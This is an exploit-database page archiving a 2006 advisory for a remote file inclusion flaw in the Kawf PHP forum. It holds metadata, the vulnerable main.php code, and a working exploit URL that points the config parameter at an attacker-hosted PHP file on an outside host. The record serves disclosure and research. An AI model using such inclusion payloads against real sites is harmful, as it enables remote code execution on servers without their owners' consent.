header-logo
Suggest Exploit
vendor:
Kawf
by:
str0ke
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Kawf
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:kawf:kawf
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

kawf (config) Remote File Include

Kawf is a web forum written in PHP4 using MySQL v. 1.0 and all below. The vulnerability exists in the main.php file, where an attacker can inject malicious code via the srcroot parameter. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Mitigation:

Ensure that user input is properly validated and filtered before being used in the application.
Source

Exploit-DB raw data:

####################################################################
#       kawf (config)  Remote File Include
#---------------------------------------------------------------------------------------------
#       Kawf is a web forum written in PHP4 using MySQL
#        v. 1.0 and all below
#--------------------------------------------------------------------------------------------
#       download :
#       http://sourceforge.net/projects/kawf
#--------------------------------------------------------------------------------------------
#       see the bug file:
#       http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require
#--------------------------------------------------------------------------------------------
#       bug in  :
#       main.php
#--------------------------------------------------------------------------------------------
#code : { i wrote all code for str0ke :D :D } include in line 13 ::
#                                                       #
#                                                       /* First setup the path */
#                                                       $include_path = "$srcroot/include:$srcroot/user/account";
#                                                       if (isset($include_append))
#                                                         $include_path .= ":" . $include_append;
#
#                                                       $old_include_path = ini_get("include_path");
#                                                       if (!empty($old_include_path))
#                                                         $include_path .= ":" . $old_include_path;
#                                                       ini_set("include_path", $include_path);
#
#                                                       include_once("$config.inc");
#                                                       require_once("sql.inc");
#                                                       require_once("util.inc");
#                                                       require_once("page.inc");
#                                                       require_once("forumuser.inc");
#
#                                                       sql_open($database);
#
#                                                       include("index.php");
#
#                                                       sql_close();
#                                                       ?>
#--------------------------------------------------------------------------------------------
#       exploit:
#          kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#                                          or
#         (path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#--------------------------------------------------------------------------
#       greetz :  str0ke ,  c0ldz3r0 ,  all members in  xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D
#      inter_vieri_21 dont play runescape :d :d
#-------------------------------------------------------------------------
#      by o0xxdark0o
# i think... so that... i m here
#  o0xxdark0o@msn.com
####################################################################

# milw0rm.com [2006-10-21]

Navigation

Suggest Exploit

Services By CQR